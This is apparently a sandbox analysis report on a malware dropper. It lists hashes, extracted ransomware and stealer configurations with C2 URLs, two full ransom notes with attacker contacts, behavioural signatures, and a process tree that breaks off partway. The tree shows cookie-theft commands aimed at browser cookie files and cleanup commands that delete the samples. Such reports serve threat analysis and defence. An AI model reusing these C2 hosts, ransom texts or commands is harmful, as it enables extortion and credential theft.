Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1811s
  • max time network
    1845s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-07-2021 12:54

General

  • Target

    8 (17).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: udacha123@mail2tor.com and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: udacha123@mail2tor.com telegram @udacha123yes 100$=24 hour Attention !!! in 24 hours the price will increase 3 times !!! have time to pay Your personal ID: 225-D4A-C5A Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

udacha123@mail2tor.com

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-N3p42CffoV Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0318ewgfDduyjQTOBSgXDiJALhsMukZh62JX1m6EZBVPH0E2Wy
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-N3p42CffoV

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

sel21

C2

salkefard.xyz:80

Extracted

Family

redline

Botnet

23_7_r

C2

zertypelil.xyz:80

Extracted

Family

vidar

Version

39.7

Botnet

921

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs
  • Vidar Stealer 7 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 5 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Looks for VMWare Tools registry key 2 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 34 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 23 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 26 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 33 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 24 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
      PID:2460
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s BITS
      1⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of UnmapMainImage
      • Suspicious use of WriteProcessMemory
      PID:3380
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2224
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2768
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2688
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2660
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2424
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1764
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1344
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1296
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                  • Modifies registry class
                  PID:1136
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1096
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:932
                    • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                      C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:5128
                      • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                        C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                        3⤵
                          PID:4160
                      • C:\Users\Admin\AppData\Roaming\cbcbehv
                        C:\Users\Admin\AppData\Roaming\cbcbehv
                        2⤵
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2300
                      • C:\Users\Admin\AppData\Roaming\ducbehv
                        C:\Users\Admin\AppData\Roaming\ducbehv
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:3840
                        • C:\Users\Admin\AppData\Roaming\ducbehv
                          C:\Users\Admin\AppData\Roaming\ducbehv
                          3⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:1108
                      • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                        C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:5828
                        • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                          C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                          3⤵
                            PID:5536
                        • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                          C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:6088
                          • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                            C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                            3⤵
                              PID:4408
                          • C:\Users\Admin\AppData\Roaming\cbcbehv
                            C:\Users\Admin\AppData\Roaming\cbcbehv
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5844
                          • C:\Users\Admin\AppData\Roaming\ducbehv
                            C:\Users\Admin\AppData\Roaming\ducbehv
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:5436
                            • C:\Users\Admin\AppData\Roaming\ducbehv
                              C:\Users\Admin\AppData\Roaming\ducbehv
                              3⤵
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:5820
                          • C:\Users\Admin\AppData\Roaming\rrcbehv
                            C:\Users\Admin\AppData\Roaming\rrcbehv
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4272
                          • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                            C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:5800
                            • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                              C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                              3⤵
                                PID:5568
                            • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                              C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:5828
                              • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                                C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                                3⤵
                                  PID:5924
                              • C:\Users\Admin\AppData\Roaming\cbcbehv
                                C:\Users\Admin\AppData\Roaming\cbcbehv
                                2⤵
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:4392
                              • C:\Users\Admin\AppData\Roaming\rrcbehv
                                C:\Users\Admin\AppData\Roaming\rrcbehv
                                2⤵
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:4792
                              • C:\Users\Admin\AppData\Roaming\ducbehv
                                C:\Users\Admin\AppData\Roaming\ducbehv
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:4976
                                • C:\Users\Admin\AppData\Roaming\ducbehv
                                  C:\Users\Admin\AppData\Roaming\ducbehv
                                  3⤵
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:4192
                              • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                                C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:5520
                                • C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe
                                  C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d\EDB7.exe --Task
                                  3⤵
                                    PID:6096
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                1⤵
                                  PID:1004
                                • C:\Users\Admin\AppData\Local\Temp\8 (17).exe
                                  "C:\Users\Admin\AppData\Local\Temp\8 (17).exe"
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2168
                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:3044
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\setup_install.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\setup_install.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:992
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1036
                                        • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_1.exe
                                          sonia_1.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:2112
                                          • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_1.exe" -a
                                            6⤵
                                            • Executes dropped EXE
                                            PID:3908
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1664
                                        • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_3.exe
                                          sonia_3.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:408
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 904
                                            6⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4644
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_6.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:3372
                                        • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_6.exe
                                          sonia_6.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious use of WriteProcessMemory
                                          PID:3960
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                            • Executes dropped EXE
                                            PID:2624
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4852
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                              PID:4420
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              6⤵
                                                PID:1108
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                            4⤵
                                              PID:2884
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sonia_5.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:3488
                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_5.exe
                                                sonia_5.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                PID:3864
                                                • C:\Users\Admin\Documents\iV5jdevgXIRO8jAs0ZryazqL.exe
                                                  "C:\Users\Admin\Documents\iV5jdevgXIRO8jAs0ZryazqL.exe"
                                                  6⤵
                                                    PID:4636
                                                    • C:\Users\Admin\Documents\iV5jdevgXIRO8jAs0ZryazqL.exe
                                                      "C:\Users\Admin\Documents\iV5jdevgXIRO8jAs0ZryazqL.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:2276
                                                  • C:\Users\Admin\Documents\GQSLnCEXnPhtoMDF0BkdJBxS.exe
                                                    "C:\Users\Admin\Documents\GQSLnCEXnPhtoMDF0BkdJBxS.exe"
                                                    6⤵
                                                      PID:4660
                                                      • C:\Users\Admin\Documents\GQSLnCEXnPhtoMDF0BkdJBxS.exe
                                                        C:\Users\Admin\Documents\GQSLnCEXnPhtoMDF0BkdJBxS.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:4380
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im GQSLnCEXnPhtoMDF0BkdJBxS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\GQSLnCEXnPhtoMDF0BkdJBxS.exe" & del C:\ProgramData\*.dll & exit
                                                          8⤵
                                                            PID:4216
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im GQSLnCEXnPhtoMDF0BkdJBxS.exe /f
                                                              9⤵
                                                              • Kills process with taskkill
                                                              PID:5228
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              9⤵
                                                              • Delays execution with timeout.exe
                                                              PID:6008
                                                      • C:\Users\Admin\Documents\d_nCXUbabJjLmJXhwOVK6W6C.exe
                                                        "C:\Users\Admin\Documents\d_nCXUbabJjLmJXhwOVK6W6C.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:4648
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im d_nCXUbabJjLmJXhwOVK6W6C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\d_nCXUbabJjLmJXhwOVK6W6C.exe" & del C:\ProgramData\*.dll & exit
                                                          7⤵
                                                            PID:4572
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im d_nCXUbabJjLmJXhwOVK6W6C.exe /f
                                                              8⤵
                                                              • Kills process with taskkill
                                                              PID:5236
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              8⤵
                                                              • Delays execution with timeout.exe
                                                              PID:5944
                                                        • C:\Users\Admin\Documents\GdHf323f15SiryCjEbB3wgwA.exe
                                                          "C:\Users\Admin\Documents\GdHf323f15SiryCjEbB3wgwA.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4720
                                                        • C:\Users\Admin\Documents\vPRIBqW0sfuBQTdXuNFDsUbk.exe
                                                          "C:\Users\Admin\Documents\vPRIBqW0sfuBQTdXuNFDsUbk.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:4804
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:4756
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4048
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                                PID:4168
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:3192
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                  PID:4204
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                    PID:5492
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:5448
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:5952
                                                                    • C:\Users\Admin\Documents\XPlkgI0WLEMwWs3dMEeOEF9L.exe
                                                                      "C:\Users\Admin\Documents\XPlkgI0WLEMwWs3dMEeOEF9L.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:4984
                                                                      • C:\Users\Admin\Documents\XPlkgI0WLEMwWs3dMEeOEF9L.exe
                                                                        C:\Users\Admin\Documents\XPlkgI0WLEMwWs3dMEeOEF9L.exe
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:632
                                                                    • C:\Users\Admin\Documents\CwOPgf3YjUiLFtt9IF1Y0EgA.exe
                                                                      "C:\Users\Admin\Documents\CwOPgf3YjUiLFtt9IF1Y0EgA.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5016
                                                                    • C:\Users\Admin\Documents\AozQncRuwcg3IULfgPpF9z59.exe
                                                                      "C:\Users\Admin\Documents\AozQncRuwcg3IULfgPpF9z59.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:4940
                                                                      • C:\Users\Admin\Documents\AozQncRuwcg3IULfgPpF9z59.exe
                                                                        "C:\Users\Admin\Documents\AozQncRuwcg3IULfgPpF9z59.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:5448
                                                                    • C:\Users\Admin\Documents\SIbC2TmdbeEY5jfOSpxW36vC.exe
                                                                      "C:\Users\Admin\Documents\SIbC2TmdbeEY5jfOSpxW36vC.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:4888
                                                                      • C:\Users\Admin\Documents\SIbC2TmdbeEY5jfOSpxW36vC.exe
                                                                        C:\Users\Admin\Documents\SIbC2TmdbeEY5jfOSpxW36vC.exe
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4420
                                                                    • C:\Users\Admin\Documents\48XJFPXCRU2EeQ4IFHRW7e5u.exe
